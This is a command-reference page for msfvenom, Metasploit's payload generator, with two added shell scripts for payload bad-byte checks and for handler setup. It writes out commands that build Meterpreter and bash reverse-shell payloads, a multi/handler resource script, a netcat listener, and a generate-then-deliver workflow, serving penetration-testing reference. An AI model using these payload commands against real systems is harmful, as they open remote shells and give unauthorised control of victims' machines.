LinuxCommandLibrary

msfvenom

Generate Metasploit payloads

TLDR

List payloads
$ msfvenom [[-l|--list]] payloads

List formats
$ msfvenom [[-l|--list]] formats

Show payload options
$ msfvenom [[-p|--payload]] [payload] --list-options

Create an ELF binary carrying a Meterpreter reverse TCP payload
$ msfvenom [[-p|--payload]] linux/x64/meterpreter/reverse_tcp LHOST=[local_ip] LPORT=[local_port] [[-f|--format]] elf [[-o|--out]] [path/to/binary]

Create an EXE binary carrying a Meterpreter reverse TCP payload
$ msfvenom [[-p|--payload]] windows/x64/meterpreter/reverse_tcp LHOST=[local_ip] LPORT=[local_port] [[-f|--format]] exe [[-o|--out]] [path/to/binary.exe]

Create a raw Bash reverse TCP payload
$ msfvenom [[-p|--payload]] cmd/unix/reverse_bash LHOST=[local_ip] LPORT=[local_port] [[-f|--format]] raw

SYNOPSIS

msfvenom [options]

PARAMETERS

-p, --payload
    Selects the payload to generate (list them with -l payloads). Payload-specific settings such as LHOST and LPORT are passed as KEY=value arguments.

-l, --list [module_type]
    Lists available modules of the given type: payloads, encoders, nops, platforms, archs, encrypt, formats, or all.

-n, --nopsled
    Prepends a NOP sled of the specified length to the payload.

-f, --format
    Specifies the output format (e.g., raw, exe, elf, dll, or a source-code format such as c, python, or csharp; list them with -l formats).

-e, --encoder
    Specifies the encoder to use (list them with -l encoders). Encoders exist to satisfy bad-character constraints; they are not a reliable antivirus evasion technique on their own.

-a, --arch
    Specifies the target architecture (e.g., x86, x64; list them with -l archs). Normally inferred from the payload name.

-o, --out
    Saves the generated payload to the specified file path instead of writing it to standard output.

-s, --space
    The maximum size of the resulting payload in bytes, measured after encoding; msfvenom will not emit a payload larger than this.

-b, --bad-chars
    Specifies bytes that must not appear in the payload, e.g., '\x00\x0a\x0d'. msfvenom then selects an encoder automatically to eliminate them.

-i, --iterations
    Number of encoding passes. Each pass adds another decoder stub and grows the payload.

--platform
    Specifies the target platform (e.g., windows, linux; list them with -l platforms). Normally inferred from the payload name.

-v, --var-name
    Specifies the variable name used in source-code output formats such as c, python, or csharp.

-x, --template
    Specifies an existing executable to use as a template; the payload is embedded in a copy of it.

-k, --keep
    Preserves the template's original functionality when using -x by injecting the payload as a new thread.

-h, --help
    Displays help information.
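
The -s and -b options exist because an exploit's buffer, not the attacker, dictates what the payload may look like. The following POSIX shell script is an added example (not msfvenom code and not from this page): it assembles the msfvenom command line from those constraints and then checks a raw payload file for forbidden bytes and for the size budget, the two things worth re-verifying because the decoder stub that -b forces msfvenom to add changes both. msfvenom itself is never run here, and the six payload bytes in write_sample are constructed for the demo.

```shell
#!/bin/sh
# Added example (not msfvenom code): assemble an msfvenom command from the
# constraints an exploit imposes and verify a raw payload file against them.
# msfvenom itself is never called here, so the script runs offline; the
# payload bytes in write_sample are constructed for the demo.

# Print the msfvenom invocation for a raw shellcode blob that must fit in
# $4 bytes and avoid the bytes in $5 (msfvenom's -b syntax, e.g. '\x00\x0a').
# With -b set, msfvenom picks an encoder on its own; the decoder stub it
# adds counts against -s, so the size limit applies to the final output.
build_cmd() {
    payload=$1; lhost=$2; lport=$3; space=$4; badchars=$5; out=$6
    printf "msfvenom -p %s LHOST=%s LPORT=%s -f raw -s %s -b '%s' -o %s\n" \
        "$payload" "$lhost" "$lport" "$space" "$badchars" "$out"
}

# Dump a raw payload as one lowercase hex byte per line (POSIX od only,
# -v so runs of identical bytes are not collapsed into "*").
hex_bytes() {
    od -An -v -tx1 "$1" | tr -s ' \n' '\n'
}

# Report every occurrence of a forbidden byte with its offset.
# $1 = payload file, $2 = forbidden bytes as space-separated hex ("00 0a 0d").
# Returns 0 when the payload is clean, 1 when any bad byte is present.
check_badchars() {
    file=$1; bad=$(printf '%s' "$2" | tr 'A-Z' 'a-z'); rc=0; offset=0
    for byte in $(hex_bytes "$file"); do
        for b in $bad; do
            if [ "$byte" = "$b" ]; then
                printf 'bad byte 0x%s at offset %d\n' "$byte" "$offset"
                rc=1
            fi
        done
        offset=$((offset + 1))
    done
    return $rc
}

# Returns 0 when the file is no larger than $2 bytes (what -s is meant to
# guarantee; worth re-checking because encoding grows the payload).
payload_fits() {
    [ "$(wc -c < "$1" | tr -d ' ')" -le "$2" ]
}

# Constructed sample: two NOPs, "xor eax,eax", then a NUL and a newline,
# exactly the bytes a strcpy()- or gets()-based overflow would truncate on.
write_sample() {
    printf '\220\220\061\300\000\012' > "$1"
}

if [ "${1:-}" = "demo" ]; then
    f=$(mktemp)
    write_sample "$f"
    build_cmd linux/x86/shell_reverse_tcp 10.0.0.5 4444 200 '\x00\x0a\x0d' "$f"
    payload_fits "$f" 200 && echo "size ok"
    check_badchars "$f" "00 0a 0d" || echo "bad bytes present: regenerate with -b"
    rm -f "$f"
fi
```

Run it with the argument demo to see the generated command and the two offending bytes reported at offsets 4 and 5. In practice you run the printed msfvenom command, then point check_badchars and payload_fits at the file it wrote; if either fails, tighten -b, change encoder with -e, or choose a smaller payload (a staged shell stager rather than stageless meterpreter, for instance).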

DESCRIPTION

msfvenom is the standalone payload generator of the Metasploit Framework. It replaced the separate msfpayload and msfencode tools of earlier versions, combining payload generation and encoding in one command. It produces shellcode and complete executables for many operating systems and architectures, can encode the output or embed it in an existing executable template, and emits it in raw, binary, or source-code formats.
It is the usual way for penetration testers and security researchers to turn a Metasploit payload into a deliverable artifact, and it supports many platforms, architectures, payload types, encoders, and output formats through a single interface. Note that encoders were designed to satisfy bad-character constraints imposed by exploits, not to evade antivirus; encoded payloads are widely signatured, so encoding alone should not be relied on for evasion.

CAVEATS

Payloads generated with msfvenom, including encoded ones, are widely signatured by antivirus and EDR products; encoding addresses bad-character constraints and should not be mistaken for evasion. Every payload must be paired with a handler whose PAYLOAD, LHOST, and LPORT match what was generated. Check --list-options before using a payload you do not understand, since defaults such as EXITFUNC on Windows payloads affect what happens to the target process. Some options do not apply to every payload or format: -x and -k only make sense with an executable template, and -v only with source-code output formats.

UNDERSTANDING PAYLOAD STAGES

Many payloads are 'staged'. msfvenom then emits only a small stager whose job is to reach the handler (for a reverse payload, connect back to LHOST:LPORT) and receive the rest of the payload, the 'stage', which the handler sends over that connection at run time. This keeps the initial artifact small enough for tight exploit buffers, at the cost of requiring a Metasploit handler on the other end to serve the stage. Stageless payloads carry everything in one blob. The naming convention tells them apart: a slash before the connection type marks a staged payload (windows/x64/meterpreter/reverse_tcp), an underscore marks a stageless one (windows/x64/meterpreter_reverse_tcp). msfvenom generates the stager or the stageless payload; the stage of a staged payload is delivered by exploit/multi/handler and is never written to disk by msfvenom.

CUSTOMIZING PAYLOADS

msfvenom accepts payload-specific options as KEY=value arguments on the command line. The most common are LHOST and LPORT: for reverse payloads they are the address and port of the handler the target connects back to, so they must match the handler's settings exactly; bind payloads instead open a listener on the target, and the handler connects to it. Running -p [payload] --list-options shows every option a payload understands together with its defaults. Use -o to write the result to a file; without it the payload goes to standard output.
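
The two sections above (payload staging and the LHOST/LPORT options) come together at the handler: the stager only works if something at LHOST:LPORT speaks the right protocol. The following POSIX shell script is an added example (not Metasploit code and not from this page). It classifies a payload name as staged or stageless from the slash/underscore convention, says whether a bare TCP listener can catch it or a Metasploit handler is required, and writes the msfconsole resource script for exploit/multi/handler with settings copied from the msfvenom invocation. It runs nothing from Metasploit, so it works offline; the list of stage names inside payload_kind is a heuristic assumed for this demo, not an official list.

```shell
#!/bin/sh
# Added example (not msfvenom or Metasploit code): classify a payload name
# as staged or stageless, decide which listener can catch it, and write the
# exploit/multi/handler resource script whose settings must match what was
# passed to msfvenom. Nothing here runs msfvenom or msfconsole, so it works
# offline. The stage-name list in payload_kind is a heuristic assumed for
# this demo, not an official Metasploit list.

# Staged payloads name the stage as its own path component before the
# stager ("windows/x64/meterpreter/reverse_tcp"); stageless payloads fuse
# them with an underscore ("windows/x64/meterpreter_reverse_tcp").
# Prints "staged" or "stageless".
payload_kind() {
    stage=$(printf '%s\n' "$1" | awk -F/ 'NF >= 2 { print $(NF-1) }')
    case "$stage" in
        meterpreter|shell|vncinject|dllinject|upexec|custom) echo staged ;;
        *) echo stageless ;;
    esac
}

# A staged payload needs exploit/multi/handler on the other end because the
# handler is what sends the stage; meterpreter needs it even when stageless,
# since it speaks the meterpreter protocol. Only a stageless plain shell
# (linux/x64/shell_reverse_tcp, cmd/unix/reverse_bash, ...) can be caught
# with a bare TCP listener such as "nc -lvnp PORT".
# Prints "msfconsole" or "netcat".
handler_needed() {
    if [ "$(payload_kind "$1")" = staged ]; then
        echo msfconsole
        return 0
    fi
    case "$1" in
        *meterpreter*) echo msfconsole ;;
        *) echo netcat ;;
    esac
}

# Write an msfconsole resource script for the handler. PAYLOAD, LHOST and
# LPORT must be exactly the values given to msfvenom: a stager that reaches
# a handler configured for a different payload gets no usable stage and the
# session dies. "set ExitOnSession false" plus "exploit -j -z" keep the
# handler running as a background job so it can accept more than one callback.
# $1 = payload, $2 = LHOST, $3 = LPORT, $4 = output file
write_handler_rc() {
    {
        echo "use exploit/multi/handler"
        echo "set PAYLOAD $1"
        echo "set LHOST $2"
        echo "set LPORT $3"
        echo "set ExitOnSession false"
        echo "exploit -j -z"
    } > "$4"
}

if [ "${1:-}" = "demo" ]; then
    for p in windows/x64/meterpreter/reverse_tcp windows/x64/meterpreter_reverse_tcp \
             linux/x64/shell_reverse_tcp cmd/unix/reverse_bash; do
        printf '%-40s %-10s catch with: %s\n' "$p" "$(payload_kind "$p")" "$(handler_needed "$p")"
    done
    write_handler_rc linux/x64/meterpreter/reverse_tcp 10.0.0.5 4444 handler.rc
    echo "wrote handler.rc; start it with: msfconsole -q -r handler.rc"
fi
```

Run it with the argument demo. The workflow it supports is: generate with msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f elf -o payload, write handler.rc with the same three values, start msfconsole -q -r handler.rc, and only then deliver the file. If handler_needed prints netcat, nc -lvnp 4444 on the LHOST machine is enough and msfconsole is optional.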

HISTORY

msfvenom was introduced as a replacement for the separate msfpayload and msfencode tools in Metasploit. This change was made to streamline the payload generation process and improve the user experience.
Its development focused on consolidating payload generation and encoding functionality into a single, unified tool. msfvenom aimed to simplify payload creation and manipulation, making it easier for security professionals to generate and customize payloads for various penetration testing and security research tasks. Over time, it has been expanded with new features, payloads, encoders, and output formats.
